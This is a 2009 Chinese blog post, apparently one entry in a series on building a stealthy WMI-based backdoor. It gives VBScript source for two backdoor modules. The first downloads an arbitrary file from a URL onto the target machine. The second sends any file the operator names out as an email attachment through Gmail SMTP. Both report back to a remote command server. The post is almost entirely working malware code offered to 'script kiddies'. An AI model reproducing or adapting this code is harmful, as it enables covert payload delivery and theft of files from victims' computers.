a2uploader:利用WMI打造完美 3无 后门-Downloader  and  Uploader

on 2009-9-12 in 安全 | 0 Comment
来源:菠萝菠萝格

Welcome!各位ScriptKid欢迎来到脚本世界

终于到周末可以多陪陪家人玩玩游戏研究研究自己感兴趣东西了

今天继续是两个很简单功能下载指定文件到目标机器和获取目标机器任意文件

直接来看举例代码

Downloader

Function DownLoadFile
Set Http=CreateObject("WinHttp.WinHttpRequest.5.1") //想绕过防火墙请使用InternetExplorer.Application
SplitCmd=Split(CmdText,"|") //分离命令参数命令格式是:命令号|远程URL|本地文件|超时时间
If UBound(SplitCmd)<3 Then //简单判断命令格式是否合法
Http.Open "GET","http://"&CmdServer&"/"&ServerPath&"/out.asp?cmdresult=Command Error!&macaddress="&CmdFile,True
Http.send
Exit Function
End If
Url=SplitCmd(1) //提取URL
LocalFile=SplitCmd(2) //提取本地文件路径
TimeOut=SplitCmd(3) //提取超时时间
Http.Open "GET",Url,False
Http.Send
If Http.Status>299 OR Not Http.WaitForResponse(Timeout) Then //如果返回码>299或者超时
Http.Open "GET","http://"&CmdServer&"/"&ServerPath&"/out.asp?cmdresult=File DownLoad Error!&macaddress=""&CmdFile,True
Http.send
Else
fso.CreateTextFile(LocalFile) //写入本地文件
ASO.open:ASO.loadfromfile LocalFile
ASO.position=0
ASO.type=1
ASO.Write Http.ResponseBody
ASO.SaveToFile LocalFile,2
ASO.close
Http.Open "GET","http://"&CmdServer&"/"&ServerPath&"/out.asp?cmdresult=File DownLoad Success!&macaddress="&CmdFile,True
Http.send
End If
End Function

Uploader

这里用是邮件附件方式发送我们指定任意文件不是最好方式不过顺便也当介绍下如何用vbs发送邮件(支持SSL)

Function SendFile
GetFileName=Mid(Trim(CmdText),9,Len(Trim(CmdText))-8)   //另种比较土分离命令参数思路方法命令格式:getfile|文件绝对路径
Set Email = CreateObject("CDO.Message") //创建CDO.Message对象
NameSpace = "http://schemas.microsoft.com/cdo/configuration/" //指定名称空间
Email.From = "[email protected]" //发信信箱
Email.To = "[email protected]" //收信信箱
Email.Subject = "File That You Want-"&CmdFile&"-"&GetFileName //邮件主题
Email.Textbody = "File That You Want" //邮件内容
Email.AddAttachment GetFileName,true //附上我们指定文件
With Email.Configuration.Fields //设定发送邮件参数
.Item(NameSpace&"sendusing") = 2 //cdoSendUsingPort
.Item(NameSpace&"smtpserver") = "smtp.gmail.com" //smtp服务器
.Item(NameSpace&"smtpserverport") = 465 //smtp端口Gmail是465
.Item(NameSpace&"smtpusessl") = true //Gmail使用是ssl
.Item(NameSpace&"smtpauthenticate") = 1 //认证方式basic
.Item(NameSpace&"sendusername") = "[email protected]" //登录smtp用户名
.Item(NameSpace&"sendpassword") = "lalalalalaooolll" //密码不用试了肯定不对^0^
.Update //更新配置
End With
Email.Send
Http.Open "GET","http://"&CmdServer&"/"&ServerPath&"/out.asp?cmdresult=File Has Been Sended!&macaddress="&CmdFile,true //嘿!已经发过去了赶紧收信吧
Http.send
End Function



  • 篇文章: 利用WMI打造完美“ 3无”后门(序章)

  • 篇文章: SQL注入原理深度解析
    • Tags:  uploader.exe uploader.ocx uploader a2uploader

    延伸阅读

    最新评论

    发表评论